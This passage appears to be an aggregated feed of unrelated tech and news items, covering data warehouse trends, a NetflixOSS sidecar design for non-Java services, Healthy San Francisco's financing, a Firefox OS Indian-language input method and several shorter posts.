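The intuition behind that speed-up can be illustrated with plain Python (this is only a toy illustration of data layout, not how a real column-store DBMS is implemented): an aggregate over one column only needs to scan that column when the data is stored column-wise, instead of touching every complete row.

# Row layout: the aggregate query walks whole rows.
rows = [{"order_id": i, "customer": f"c{i % 100}", "amount": float(i)}
        for i in range(100_000)]
total_row_store = sum(r["amount"] for r in rows)      # touches every column of every row

# Column layout: the same aggregate scans a single contiguous column.
columns = {"order_id": [r["order_id"] for r in rows],
           "customer": [r["customer"] for r in rows],
           "amount":   [r["amount"] for r in rows]}
total_column_store = sum(columns["amount"])           # touches only the amount column

assert total_row_store == total_column_store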


7. In-Memory DBMSs (Database Management System)
Not only do in-memory DBMSs deliver fast query responses, they introduce a higher probability that analytics and transactional systems can share the same database. Analytic data models, master data approaches and data services within a middle tier will begin to emerge as the dominant approach, forcing more traditional row-based vendors to adapt to column approaches and in-memory simultaneously.


8. Data Warehouse as a Service and Cloud
According to Gartner, in 2011, data warehouse as a service comes in two "flavors" — software as a service (SaaS) and outsourced data warehouses. Data warehouse in the cloud is primarily an infrastructure design option as a data model must still be developed, an integration strategy must be deployed and BI user access must be enabled and managed. Private clouds are an emerging infrastructure design choice for some organizations in supporting their data warehouse and analytics.


9. Using an Open-Source DBMS to Deploy the Data Warehouse
Gartner states that this particular trend still remains in the experimental stage. At this point, open-source warehouses are rare and usually smaller than traditional ones and also generally require a more manual level of support. However, some solutions are optimized specifically for data warehousing.


          NTT Com Starts Japan’s 1st eSIM Proof of Concept for MVNOs        
          Integrators '20 under 40' 2015—Scott Ranger        
10/13/2015
Martha Entwistle

Scott Ranger, 34

VP Operations, CONTAVA

Edmonton, Alberta

“My impression of security from a distance was that it was fairly simplistic, I found it was quite the contrary after spending some time with CONTAVA,” said Scott Ranger.

Ranger came to systems integration firm CONTAVA four years ago as a project manager following 14 years in the telecom industry. He was surprised to learn how technology was being used. “It’s pretty amazing what’s being done in the security world,” he said.

Although it comes with “barriers and challenges,” the technology Ranger finds the most interesting is analytics. “We see more and more use of and higher adoption rates coming through proof of concept. We’re working down the path to validate the strength and viability of analytics.”

“The right analytic technology in the right application better leverages the platform and investment,” he said. “It’s really about getting greater ROI.”

To get more talented young people involved in security, the industry needs to take a real interest in local and community colleges. CONTAVA has an organized outreach effort with local schools.

“You need to take the opportunity to inform students what the industry is all about. If you don't, you’ll lose the best students to large IT or telecoms. These students need to know that in security there’s the opportunity to work with all the world-renowned names. Security touches all platforms, which can be more exciting than focusing your career on just one.”


          A NetflixOSS sidecar in support of non-Java services        
In working on supporting our next round of IBM Cloud Service Fabric service tenants, we found that the service implementers came from very different backgrounds.  Some were skilled in Java, some in Ruby, and others were C/C++ focused, and therefore their service implementations were just as diverse.  Given the size of the teams behind the services we're on-boarding and the timeframe for going public, recoding all of these services to use the NetflixOSS Java libraries that bring operational excellence (like Archaius, Karyon, Eureka, etc.) seemed pretty unlikely.

For what it is worth, we faced a similar challenge in earlier services (mostly due to existing C/C++ applications) and we created what was called a "sidecar".  By sidecar, what I mean is a second process on each node/instance that did Cloud Service Fabric operations on behalf of the main process (the side-managed process).  Unfortunately those sidecars all went off and created one-offs for their particular service.  In this post, I'll describe a more general sidecar that doesn't force users to have these one-offs.

Sidenote:  For those not familiar with sidecars, think of the motorcycle sidecar below.  Snoopy would be the main process with Woodstock being the sidecar process.  The main work on the instance would be the motorcycle (say serving your users' REST requests).  The operational control is the sidecar (say serving health checks and management plane requests of the operational platform).


Before we get started, we need to note that there are two main types of sidecars.  There are sidecars that manage durable and/or storage tiers.  These sidecars need to manage things that other sidecars do not (like joining a stateful ring of servers, or joining a set of slaves and discovering masters, or backup and recovery of data).  Some sidecars that exist in this space are Priam (for Cassandra) and Exhibitor (for Zookeeper).  The other type is for managing stateless mid-tier services like microservices.  An example of this is AirBNB's Synapse and Nerve.  You'll see in the announcement of Synapse and Nerve on AirBNB's blog that they are trying to solve some (but not all) of the issues I will mention in this blog post.

What are some things that a microservice sidecar could do for a microservice?

1. Service discovery registration and heartbeat

This registration with service discovery would have to happen only after the sidecar detects the side-managed process as ready to receive requests.  This isn't necessarily the same as if the instance is "healthy" as an instance might be healthy well before it is ready to handle requests (consider an instance that needs to pre-warm caches, etc.).  Also, all dynamic configuration of this function (where and if to register) should be considered.

2.  Health check URL

Every instance should have a health check url that can communicate out of band the health of an instance.  The sidecar would need to query the health of the side-managed process and expose this url on behalf of the side-managed process.  Various systems (like auto scaling groups, front end load balancers, and service discovery queries) would query this URL and take sick instances out of rotation.
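
For illustration, a bare-bones version of such a sidecar health endpoint might look like the sketch below. The ports, the /health path, and the assumption that the side-managed process already answers health queries on 8080 are assumptions made for this example, not part of any existing sidecar:

# Hypothetical sidecar health endpoint that reports the side-managed process's health.
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.request import urlopen
from urllib.error import URLError

SIDE_MANAGED_HEALTH = "http://localhost:8080/health"   # assumed URL of the main process

class HealthHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        try:
            healthy = urlopen(SIDE_MANAGED_HEALTH, timeout=2).status == 200
        except URLError:
            healthy = False
        self.send_response(200 if healthy else 503)
        self.end_headers()
        self.wfile.write(b"UP" if healthy else b"DOWN")

if __name__ == "__main__":
    # Auto scaling groups, load balancers and service discovery would poll this port.
    HTTPServer(("0.0.0.0", 8077), HealthHandler).serve_forever()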

3.  Service dependency load balancing

In a NetflixOSS-based microservice, routing can be done intelligently based upon information from service discovery (Eureka) via smart client-side load balancing (Ribbon).  Once you move this function out of the microservice implementation, it is, as AirBNB also noted, likely unnecessary and in some cases problematic to move back to centralized load balancing.  Therefore it would be nice if the sidecar would perform load balancing on behalf of the side-managed process (see the sketch after the next paragraph).  Note that Zuul (on instance in the sidecar) could fill this role in NetflixOSS.  In AirBNB's stack, the combination of service discovery and this item is done through Synapse.  Also, all dynamic configuration of this function (states of routes, timeouts, retry strategy, etc.) should be considered.

One other area to consider here (especially in the NetflixOSS space) would be if the sidecar should provide for advanced devops filters in load balancing that go beyond basic round robin load balancing.  Netflix has talked about the advantages of Zuul for this in the front/edge tier, but we could consider doing something in between microservices.
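
As referenced above, a stripped-down sketch of the load-balancing piece could look like the following. The instance list is hard-coded here for illustration; the real sidecar would refresh it from Eureka and would lean on Ribbon or Zuul rather than hand-rolled round robin:

import itertools
from urllib.request import urlopen

# Hypothetical instance list; in a real sidecar this would be refreshed from Eureka.
instances = itertools.cycle(["http://10.0.0.11:7001", "http://10.0.0.12:7001"])

def call_dependency(path, retries=2):
    # Simple round-robin with retry; Ribbon adds zone awareness, stats-based rules, etc.
    last_error = None
    for _ in range(retries + 1):
        target = next(instances) + path
        try:
            return urlopen(target, timeout=2).read()
        except OSError as err:
            last_error = err        # try the next instance
    raise last_error

# The side-managed process would call the sidecar (e.g. on localhost) rather than
# talking to the dependency directly.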

4.  Microservice latency/health metrics

Being able to have operational visibility into the error rates on calls to dependent services as well as latency and overall state of dependencies is important to knowing how to operate the side-managed process.  In NetflixOSS by using the Hystrix pattern and API, you can get such visibility through the exported Hystrix streams.  Again, Zuul (on instance in the sidecar) can provide this functionality.

5.  Eureka discovery

We have found service implementations in IBM that already have their own client-side load balancing or cluster technologies.  Also, Netflix has talked about other OSS systems such as Elastic Search.  For these systems it would be nice if the sidecar could provide a way to expose Eureka discovery outside of load balancing.  Then the client could ingest the discovery information and use it however it felt necessary.  Also, all dynamic configuration of this function should be considered.

6.  Dynamic configuration management

It would be nice if the sidecar could expose dynamic configuration to the side-managed process.  While I have mentioned the need to have the previous sidecar functions dynamically configured, it is important that the side-managed process's configuration be considered as well.  Consider the case where you want the side-managed process to use a common dynamic configuration management system but all it can do is read from property files.  In NetflixOSS this is managed via Archaius, but that requires using the NetflixOSS libraries.

7.  Circuit breaking for fault tolerance to dependencies

It would be nice if the sidecar could provide an approximation of circuit breaking.  I believe this is impossible to do as "cleanly" as using NetflixOSS Hystrix natively (as a sidecar approximation wouldn't require the user to write the specific business logic that handles failures and reduces calls to the dependency), but it might be nice to have some level of guarantee of fast failure for scenarios using #3.  Also, all dynamic configuration of this function (timeouts, etc.) should be considered.
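
A very rough approximation of what such a sidecar-level breaker could look like is sketched below. The thresholds and class name are invented, and this has none of Hystrix's fallbacks, metrics or request isolation:

import time

class SimpleCircuitBreaker:
    # Opens after max_failures consecutive errors and fast-fails until reset_after seconds pass.
    def __init__(self, max_failures=5, reset_after=30.0):
        self.max_failures, self.reset_after = max_failures, reset_after
        self.failures, self.opened_at = 0, None

    def call(self, fn, *args, **kwargs):
        if self.opened_at is not None:
            if time.time() - self.opened_at < self.reset_after:
                raise RuntimeError("circuit open: failing fast")
            self.opened_at = None          # half-open: allow one trial call
        try:
            result = fn(*args, **kwargs)
        except Exception:
            self.failures += 1
            if self.failures >= self.max_failures:
                self.opened_at = time.time()
            raise
        self.failures = 0
        return result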

8.  Application level metrics

It would be nice if the sidecar could allow the side-managed process to more easily publish application-specific metrics to the metrics pipeline.  While every language likely already has a nice binding to systems like statsd/collectd, it might be worth making the interface to these systems common through the sidecar.  For NetflixOSS, this is done through Servo.

9. Manual GUI and programmatic control

We have found the need to sometimes quickly dive into a specific instance with human eyes.  Having a private web based UI is far easier than loading up ssh.  Also, if you want to script access to the functions and data collected by the sidecar, we would like a REST or even JMX interface to the control offered in the sidecar.

This all said, I started a quick project last week to create a sidecar that does some of these functions using NetflixOSS so it integrated cleanly into our existing IBM Cloud Services Fabric environment.  I decided to do it in github, so others can contribute.

By using Karyon as a base for the sidecar, I was able to get a few of the items on the list automatically (specifically #1, #2 partially and #9).  I started with the most basic sidecar in the trunk project.  Then I added two more things:


Consul style health checks:


In work leading up to this project, Spencer Gibb pointed me to the sidecar agent checks that Consul uses (which they said they based on Nagios).  I based a similar set of checks on these for my sidecar.  You can see in this Archaius config file how you'd configure them:

com.ibm.ibmcsf.sidecar.externalhealthcheck.enabled=true
com.ibm.ibmcsf.sidecar.externalhealthcheck.numchecks=1

com.ibm.ibmcsf.sidecar.externalhealthcheck.1.id=local-ping-healthcheckurl
com.ibm.ibmcsf.sidecar.externalhealthcheck.1.description=Runs a script that curls the healthcheck url of the sidemanaged process
com.ibm.ibmcsf.sidecar.externalhealthcheck.1.interval=10000
com.ibm.ibmcsf.sidecar.externalhealthcheck.1.script=/opt/sidecars/curllocalhost.sh 8080 /
com.ibm.ibmcsf.sidecar.externalhealthcheck.1.workingdir=/tmp

com.ibm.ibmcsf.sidecar.externalhealthcheck.2.id=local-killswitch
com.ibm.ibmcsf.sidecar.externalhealthcheck.2.description=Runs a script that tests if /opt/sidecarscripts/killswitch.txt exists
com.ibm.ibmcsf.sidecar.externalhealthcheck.2.interval=30000
com.ibm.ibmcsf.sidecar.externalhealthcheck.2.script=/opt/sidecars/checkKillswitch.sh

Specifically, you define a check as an external script that the sidecar executes; if the script returns a code of 0, the check is marked as healthy (1 = warning, anything else = unhealthy).  If all defined checks come back as healthy for more than three iterations, the instance is healthy.  I have coded up some basic shell scripts that we'll likely give to all of our users (like curllocalhost.sh and checkkillswitchtxtfile.sh).  Once I had these checks being executed by the sidecar, it was pretty easy to change the Karyon/Eureka HealthCheckHandler class to query the CheckManager logic I added.
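
The check loop itself does not need to be much more than the following sketch. The class and function names are invented for illustration and are not the ones used in the github project, but the exit-code mapping and the three-iteration rule mirror the description above:

import subprocess, time

HEALTHY, WARNING, UNHEALTHY = 0, 1, 2

class ExternalCheck:
    def __init__(self, script, interval_ms, workingdir="/tmp"):
        self.script, self.interval = script, interval_ms / 1000.0
        self.workingdir, self.healthy_streak = workingdir, 0

    def run_once(self):
        # Exit code 0 = healthy, 1 = warning, anything else = unhealthy.
        code = subprocess.call(self.script.split(), cwd=self.workingdir)
        status = {0: HEALTHY, 1: WARNING}.get(code, UNHEALTHY)
        self.healthy_streak = self.healthy_streak + 1 if status == HEALTHY else 0
        return status

def instance_is_healthy(checks):
    # The instance is reported healthy only once every check has passed
    # for more than three consecutive iterations.
    return all(c.healthy_streak > 3 for c in checks)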


Integration with Dynamic Configuration Management


We believe most languages can easily register events based on files changing and can easily read properties files.  Based on this, I added another feature, configured via this Archaius config file:

com.ibm.ibmcsf.sidecar.dynamicpropertywriter.enabled=true
com.ibm.ibmcsf.sidecar.dynamicpropertywriter.file.template=/opt/sidecars/appspecific.properties.template
com.ibm.ibmcsf.sidecar.dynamicpropertywriter.file=/opt/sidecars/appspecific.properties

What this says is that a user of the sidecar puts all of the properties they care about in the file.template properties file; then, as configuration is dynamically updated in Archaius, the sidecar sees this and writes out a copy to the main properties file with the current values filled in.
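
Conceptually, the writer does something like the sketch below (illustration only; the real code hooks into Archaius change callbacks rather than being handed a plain dict of current values):

# Fill a properties template with the current dynamic configuration values and
# atomically replace the file the side-managed process watches.
import os, tempfile

def write_properties(template_path, output_path, current_config):
    lines = []
    with open(template_path) as template:
        for line in template:
            key = line.split("=", 1)[0].strip()
            if key and not key.startswith("#") and key in current_config:
                lines.append(f"{key}={current_config[key]}\n")
            else:
                lines.append(line)
    fd, tmp = tempfile.mkstemp(dir=os.path.dirname(output_path))
    with os.fdopen(fd, "w") as out:
        out.writelines(lines)
    os.replace(tmp, output_path)   # the side-managed process sees one consistent file

# Called whenever the dynamic configuration reports that a watched property changed.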

With these changes, I think we now have a pretty solid story for #1, #2, #6 and #9.  I'd like to next focus on #3, #4, and #7 adding a Zuul and Hystrix based sidecar process but I don't have users (yet) pushing for these functions.  Also, I should note that the code is a proof of concept and needs to be hardened as it was just a side project for me.

PS.  I do want to make it clear that while this sidecar approach could be used for Java services (as opposed to languages that don't have NetflixOSS bindings), I do not advocate moving these functions out of your Java implementation.  There are places where offering this function in a sidecar isn't as "excellent" operationally and is closer to "good enough".  I'll leave it to the reader to understand these tradeoffs.  However, I hope that work in this microservice sidecar space leads to easier NetflixOSS adoption in non-Java environments.

PPS.  This sidecar might be more useful in the container space as well at a host level.  Taking the sidecar and making it work across multiple single process instances on a host would be an interesting extension of this work.



          Listen YouTube music on Android device with QPython and VLC - StreaMe        

Get the source and other information on GitHub


Usage example



Article in progress




Ethical considerations

YouTube is a fantastic service that allows everyone to watch videos from all over the world and listen to their favorite music, and, with rare exceptions, it is open to all.
Open means that everyone can access it without paying, but the music is not free.
To provide this service, Google invests in infrastructure, development, security and research, and of course rewards artists for their work.
The only thing that is required is to pay attention to some advertisements.
Some do not like it, and some think there are other ways, but the truth is that the internet has grown thanks to advertising. It has gone well for 20 years; it will be fine for another 20.

Practical considerations

The Play Store is full of applications that allow you to play and download music from YouTube.
Why doesn't Google remove these apps?
Because almost all of these applications are free but full of adverts, and Google obviously takes its percentage.


However, the purpose of this project is not to steal from the pockets of Google or to compete with Spotify or Deezer.
It's only a proof of concept of what you can do with a few lines of code and a bit of DIY philosophy.

Requirements



If you are able to compile VLC from source with this commit, you can see the video title in VLC instead of a long, ugly URL.



          RE: Purpose of DirectX        
When the Fahrenheit project started, OpenGL had only recently become an API usable for PC games, and was mainly used with expensive GPUs for business applications (and this is why it was in NT, MS' business OS, in the first place). DirectX had been used in games along with proprietary APIs from various GPU vendors. GLQuake came out the same year that work on the Fahrenheit project began and was basically a proof of concept because John Carmack wasn't satisfied with writing to multiple GPU vendor APIs. The 3dfx Voodoo Graphics was basically the only PC GPU that could run it well, and long after GLQuake's release, GPU vendors were trying to get miniGL drivers working. SGI didn't need any direct help from MS to lose marketshare. The constant performance improvements to PCs virtually killed SGI along with a lot of their talent starting or joining PC GPU companies. As with proprietary Unix in general, people that used to require expensive, high-end systems started looking at the PC as a cheaper alternative.
          'Proof of Concept' Study Points to Possible Link Between Aerobic Exercise and Improvement in Cognitive Function in Patients With Vascular-Based Impairment        
Could aerobic activity actually improve cognitive function in older adults with vascular-based impairments?
          San Francisco’s universal health plan reaches tens of thousands, but rests on unstable funding        

Coordination and prevention improve care, but as businesses resist, some costs are borne by one-time grants and struggling clinics

Four years ago, San Francisco launched a grand experiment, becoming the first city in the nation to offer comprehensive health care to its growing ranks of uninsured.

Stitching together two-dozen neighborhood health clinics and an array of hospitals, the city bet that two reforms — emphasis on primary care and a common electronic enrollment system — could improve outcomes and buffer the city against soaring health care costs.

By many measures, San Francisco’s effort to provide universal health care has been a huge success and has won national accolades. The initiative, Healthy San Francisco, has over time treated more than 100,000 city residents. Many who went for years without health insurance now receive the kind of preventive and specialty care usually associated with private insurance.

But the city’s grand plan has not solved the central problem dogging health care across the country: figuring out who pays for it.

While the Department of Public Health has kept its own spending on the program at under $100 million a year — about the same amount it spent on indigent care before Healthy San Francisco’s 2007 launch — it has spread an additional $78 million in costs to businesses, patients, the federal government and the health care providers themselves.

The program relies on ample, but not perpetual, federal grants for health innovation, tied to preparing for President Obama’s health initiatives that may be derailed by the U.S. Supreme Court next spring or a Republican administration after 2012. As national political and economic winds change, the city may not see the soft landing it expected from the federal reforms in the next few years.

With low payments from patients and declining dollars from employers under a new health care spending requirement, the plan’s local financing remains a challenge. Especially when the city has faced deficits of more than $300 million for each of the last three years.

Participating nonprofit community clinics in the network have been shouldering part of the financial burden. That may be a problem in an economy where health care costs are rising twice as fast as inflation. Some clinics say they are tapped out, and the $114 per-patient per-year reimbursement they get from Healthy San Francisco doesn’t come anywhere close to covering costs.

“The program is very, very important,” said Karen Hill, administrative director of Glide Health Services, a large, busy nonprofit community health clinic in the Tenderloin whose base of 3,000 patients includes 1,500 Healthy San Francisco members. “But I think we should recognize that it does not pay for the care of the population.”

At last count, Healthy San Francisco covers 54,348 patients, about two-thirds of the estimated 82,000 San Francisco adults who lack insurance, according to a September report from Mathematica Policy Research of Princeton, New Jersey. (Estimates range widely from 64,000 to 90,000 uninsured adults aged 18 to 64.)
In a survey of patient satisfaction, 94 percent said they were satisfied with the medical care they received through the program.

But clinic directors say that while the program has been great for patients, the clinics themselves struggle to deliver care to ever-growing numbers of people. Some clinics have seen their patient base grow by a third since 2007.

Healthy San Francisco has laudable goals, said Ricardo Alvarez, medical director of the Mission Neighborhood Health Center, and “has expanded care to a vulnerable underserved population.”

But for clinics to make it work, Alvarez said, “it is challenging financially.”

Several clinics, such as Lyon-Martin Health Services in Hayes Valley, have stopped taking more Healthy San Francisco patients. The center was already under financial stress this year, and announced earlier this year it had been on the brink of bankruptcy.

So as the Obama administration prepares to roll out federal health reform by 2014, cities and states look to San Francisco for proof of concept: They're finding the plan here offers ingredients for success, but not a complete answer.

“Healthy San Francisco is a model for health care delivery but not for payment,” said Stephen Shortell, the Dean of the University of California-Berkeley’s School of Public Health.

But Alvarez, of the Mission clinic, said San Francisco had little choice but to innovate.

“I think the fact that Healthy San Francisco exists is, in part, a local response to a complex problem,” he said. “The fact that we don’t have a comprehensive national healthcare program means certain localities will attempt to find their own solutions.”

Ahead of the curve

Healthy San Francisco has scored some nationally recognized successes. In drawing two-thirds of the city’s uninsured into its care, it has shrunk the number of people without some form of health care to 3 percent of the city’s population.

The program is built around a “patient-centered” primary care model that is in vogue in medical reform circles. New enrollees are primarily very poor, though any city resident making less than 500 percent of the poverty level and without proper insurance for three months can apply.

Participants choose one of 35 health clinics around the city as their “medical home.” At the clinic, they are assigned a team of providers: a doctor, a nurse practitioner and assistants who handle their visits and coordinate referrals to specialists or for hospitalization.

The theory is that by offering patients a regular doctor or medical team who might get to know them, in a place that is familiar, they will seek care before problems become acute. Numerous studies have shown that preventive care such as mammograms and cholesterol checks can detect early signs of disease before they become more difficult and costly to treat. Uninsured patients often put off tests and preventive care to avoid out-of-pocket expenses.

Shifting to the patient-centered model has also dramatically cut the use of city emergency rooms for routine care by the program’s participants. Proponents say that in the long run emergency room “diversion” — catching illness before it becomes acute — has the potential to save the city millions of dollars a year because emergency care is inevitably more expensive.

Keeping better track

Healthy San Francisco dramatically improves patient tracking by using a citywide database. Each patient’s enrollment and eligibility status is entered into one place visible to the entire network of providers. Now, a patient does not need to be re-enrolled if she needs hospitalization or to see a specialist elsewhere. If she shows up at a different clinic, she will be redirected to her home clinic. Administrators say this cuts down on duplicative care and wasted time. Patients used to hop from clinic to clinic, often carrying their own eligibility documents with them.

“We do believe it is a model,” said Tangerine Brigham, director of Healthy San Francisco and a deputy director of the Department of Health. “The medical home, the use of one standardized eligibility and enrollment system, getting all providers that are caring for this population to focus on one network, are things that should happen.”

Roland Pickens, the chief operating officer of San Francisco General Hospital — the county hospital where three-quarters of Healthy San Francisco patients go if they need hospitalization — said the program “has been a good change,” bolstering primary care, resulting in 30 percent fewer visits to the emergency room by uninsured adults and reducing the time and money spent on administrative tasks.

Alvarez relates the story of a woman named Isabel (he could not provide her last name due to medical privacy issues) who came to Mission Neighborhood Health Center with a psychotic disorder, uncontrolled diabetes and eye trouble. A behavioral health specialist calmed her down, and a physician tested her blood sugars, prescribed diabetes medication and gave her an appointment to see an ophthalmologist.

Because she was enrolled in Healthy San Francisco, all this cost the clinic a few hundred dollars, of which the city was billed $114. Had she gone to the emergency room, as many uninsured people did for routine problems before, it would have cost about $1,800, clinic officials estimated.

“Patients know this is their home, providers know this is our patient. It improves health outcomes,” said Albert Yu, medical director of Chinatown Public Health Center, the first Healthy San Francisco participating clinic. “Previously, patients would go from center to center, or the medical facility might not recognize that she is our patient. She is just coming in for a cold and therefore I can ignore the mammogram referral.”

For patients, it is often a godsend.

“It gives you the option to have medical care and everybody deserves that," said Carol Graham, who lost her job of 17 years, and with it private health insurance, before signing up for Healthy San Francisco. “Oakland doesn’t have this.” She noted that her sister, who lives across the bay, does not have access to a similar program. “I was surprised by how life can be different just by crossing the bridge.”

For Megan Alyse, signing up for Healthy San Francisco allowed her to continue to write her doctoral thesis when she was no longer connected with a school and thus without insurance. “I paid hardly anything and was able to see a doctor,” she said.

Assessing Newsomcare

In 2006, then-Mayor Gavin Newsom announced a plan hatched by then-Public Health Director Mitch Katz and then-Supervisor Tom Ammiano to cover the uninsured, albeit only within city limits. The left-leaning Board of Supervisors rallied in unanimous approval.

What existed before was a safety-net system of scattered clinics and emergency rooms that cared for whoever walked in the door. They typically treated people for whatever episode brought them in, patched them up and sent them on their way. Emergency rooms were a chaotic jumble of the sick and not-so-sick. Many people didn’t get the care they needed because they didn’t know where to go.

City leaders needed a way to make the plan work economically. And they needed to prevent employers from seeing it as a chance to cut costs by dropping private health insurance and making the city pick up the tab. In part, that meant shifting some responsibility to employers — an idea that, even if popular in San Francisco, is certainly not shared nationwide as the political climate turns toward austerity.

The city coupled Healthy San Francisco with an ordinance requiring employers to spend a minimum of $1.37 per hour per worker on employee health care. Businesses can do one of three things to meet the requirement: buy private insurance for their employees, contribute to Healthy San Francisco, or pay into a medical reimbursement account for employees who live outside the city or earn too much to qualify.

The Health Care Security Ordinance requires businesses with 20 or more workers and nonprofits with 50 or more employees to spend at least $2,849 per year for a full-time employee on health care. For larger employers the rate is $4,285.

Eighty percent of employers have chosen to satisfy the requirement by buying private insurance. The rest use the “city option” — Healthy San Francisco or the reimbursement accounts. But in the last three years, the contributions to Healthy San Francisco have been shrinking, making employer support of the program uncertain.

It adds up, for now

While the total cost of the program has stayed within the Newsom administration’s $200-million-a-year forecast, where that money comes from does not look like the projections. A plan that was supposed to be financed in large part by employers and participants is not seeing that money.

The employer contribution raised relatively modest revenues. Of Healthy San Francisco’s total $177 million budget in the last fiscal year, businesses covered just $12.9 million, or about 7 percent. When city officials created the program they envisioned businesses covering $30 million to $40 million, or at least 15 percent of the cost.

The city’s General Fund picked up nearly eight times that amount — $99.7 million. Individuals opting to buy Healthy San Francisco for themselves contributed just $5.9 million, or a bit more than 3 percent of total costs.

A big chunk of the program is covered by the federal government through a $27.4 million annual grant for local health care initiatives, awarded in 2007, which expired in July.

Another $11 million in charity care was expended by hospitals not owned by the county. The independent nonprofit community clinics — many of them barebones operations where volunteers do some of the administrative work and constant fundraising is the name of the game — contributed $16 million, mostly from federal grants for taking care of the indigent.

Without that extra $55.4 million, mostly from federal sources, the program would be hard to sustain.

U.S. subsidies uncertain

At some point, federal funding to Healthy San Francisco could disappear altogether as federal health reform is fully implemented — or if it is scrapped by a future Republican administration.

“They will have to rethink where the money is coming from,” said Dylan Roby, a research scientist and assistant professor at the University of California-Los Angeles’ Center for Health Policy Research. “They won’t have federal dollars anymore.”

But city officials said the plan all along was that the need for Healthy San Francisco would diminish later this decade with the phase-in of national health care reforms passed in 2010.

Under the Obama reforms, more of the currently uninsured population will get access to insurance through two programs: an expansion of Medicaid and the Health Insurance Exchanges, through which individuals and small businesses can buy insurance more easily. Brigham, the Healthy San Francisco director, said she expects thousands of patients to leave the system with these reforms.

“We don’t think it’s a bad thing that we’ll be serving fewer people,” Brigham said. “We’ve always said from the beginning that insurance is preferable to Healthy San Francisco. HSF is not insurance, it’s access.”

She estimated that 60 percent of Healthy San Francisco’s enrollees would eventually leave under the federal plan. In the meantime, she is not that concerned that nonprofit community clinics are footing more of the bill for treating Healthy San Francisco patients because they are getting federal grants. Before the city program, they got little if any local government money, she said.

Less from business, patients

What does concern some city officials, particularly at the Office of Labor Standards Enforcement, is the shrinking financial support by businesses.

The amount collected from employers choosing Healthy San Francisco for some of their employees is small, and gradually falling. The $12.9 million in employer contributions last year was down from $13.9 million the year before, and off by almost one-third from two years earlier, when employers contributed $18.2 million.

Healthy San Francisco’s budget also is not getting much help from individuals paying into the system. Revenue from individuals choosing Healthy San Francisco as an alternative to insurance in the 2010-2011 fiscal year was only $5.7 million, up from $5 million the year before and $3.2 million the year before that.

By and large, people enrolling in Healthy San Francisco are poor. Even though the city extended the program to uninsured people who make up to 500 percent of federal poverty level — a gross income of $50,450 for an individual, at which level they are asked to contribute a modest $150 a month, plus co-pays — the program has almost no participants in that bracket. Two-thirds of enrollees live at or below the poverty level and pay nothing. Another 26 percent are within 200 percent of poverty, and pay $20 a month — far below the cost of a doctor’s visit.

Experiments nationwide

At least one local government, Howard County in Maryland, has decided to replicate Healthy San Francisco exactly, while many other localities are studying it. Massachusetts and Vermont also have created their own permutations of “universal” health care.

In California the tab for safety-net care falls to counties, which run hospitals largely to take care of the poor and under- or uninsured. (San Francisco is both a city and a county.) The uninsured often go to the nearest hospital’s emergency room, which cannot legally turn anyone away for lack of funds.

The need surely has not gone away. U.S. Census Bureau statistics indicate that the number of uninsured people has climbed during the recession, in San Francisco and nationwide. It estimates 96,107 San Franciscans, including children and the elderly, lack insurance — about 12 percent of the city’s population. So unless and until national reforms take effect, Healthy San Francisco should expect more people seeking help, especially if the economy continues to sputter.

Nationwide 49.7 million people are uninsured — one in every six people. Spending on health care continues to far outpace inflation. U.S. health care spending grew 4 percent in 2009, to $2.5 trillion, or about $8,000 for each person, according to the Department of Health and Human Services. The growth is believed to be accelerating and is projected to average 6 percent a year between 2010 and 2019. Health care expenditures now account for 17 percent of gross domestic product, a measure of spending on all goods and services in the country.

“The U.S. has the most expensive health care system in the world, with health status indicators that are, at best, only average in comparison with the less costly health systems of other countries,” said Shortell of U.C. Berkeley’s School of Public Health, in a recent paper published in the journal Public Health Reviews. “Thus the pressure to provide more cost-effective care is particularly intense.”

Shortell said the advent of patient-centered medical homes could provide more cost-effective delivery of health care, especially if combined with payments that reward health providers for outcomes, rather than charge fees for services rendered. This is what Healthy San Francisco is trying to achieve.

“Studies show medical homes are associated with higher quality at the same or lower costs,” he said. “There’s been half a dozen studies showing that. And the federal government is encouraging medical homes.”

Shortell said Healthy San Francisco seems to be successful in addressing national concerns about costs on a local level by coordinating clinics and hospitals. But he said the city’s reliance on the federal government for much of its money, either directly or through subsidized clinics, was not a big deal. That is to be expected as local governments struggle to figure out the new mix of who pays for the uninsured.


          Indian Language support on Firefox OS using jquery.ime        
Firefox OS is coming! With the announcement of the $25 phone at MWC, there is much excitement and wait for the launch of Firefox OS phones in India.
But the software is far from feature-complete for the complex Indian market. A major task for the platform to become a "People's phone" is supporting its users' languages!
Localisation of Firefox OS is a very big task ahead. One part of it is user input in native Indian languages. Support for most Indian languages is already present on platforms like Android.

I've recently been experimenting with Language Computing using a few SMC projects. So I thought, why not build an Indian Language IME for Firefox OS? I also proposed the idea to SMC for the GSoC program.
The idea was welcomed by the mentors, and one of them, Anivar, asked me to do a feasibility study on the use of the jquery.ime library.

jquery.ime is an input method editor library supporting more than 135 input methods across more than 62 languages.

While jQuery is a great framework to kickstart web development with multi-browser support without any worries, there are specific use cases where it may not be required. The biggest example is its use in Firefox OS. Since the OS runs Gecko, there is no need for the extra JavaScript code for cross-browser support. I am planning to port the jquery.ime library to plain vanilla JavaScript. This would also enable developers using modern frameworks like AngularJS and EmberJS to take advantage of the IMEs without having a dependency on the jQuery library.
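
To make the idea concrete, here is a minimal sketch, in plain JavaScript with no jQuery, of how a rule-based input method could map Latin keystrokes to Devanagari. The hindiDemo object and its pattern table are illustrative assumptions only, not the actual jquery.ime Hindi rules, which are far larger and also track the raw keystroke history so that earlier output can be revised.

// A minimal, jQuery-free sketch of a rule-based input method.
// The pattern table is an illustrative assumption, not the real
// jquery.ime Hindi transliteration rules.
var hindiDemo = {
    id: 'hi-demo',
    maxKeyLength: 3,
    patterns: [
        [ 'kaa', 'का' ],
        [ 'ka', 'क' ],
        [ 'aa', 'आ' ],
        [ 'a', 'अ' ]
    ]
};

// Append one typed character to the buffer and apply the longest matching rule.
function applyPattern( rules, bufferText, typedChar ) {
    var text = bufferText + typedChar;
    // Try the longest candidate ending first, shrinking one character at a time.
    for ( var len = Math.min( rules.maxKeyLength, text.length ); len > 0; len-- ) {
        var key = text.slice( -len );
        for ( var i = 0; i < rules.patterns.length; i++ ) {
            if ( rules.patterns[ i ][ 0 ] === key ) {
                return text.slice( 0, -len ) + rules.patterns[ i ][ 1 ];
            }
        }
    }
    return text; // no rule matched, keep the raw input
}

// applyPattern( hindiDemo, '', 'a' )  returns 'अ'
// applyPattern( hindiDemo, 'k', 'a' ) returns 'क'

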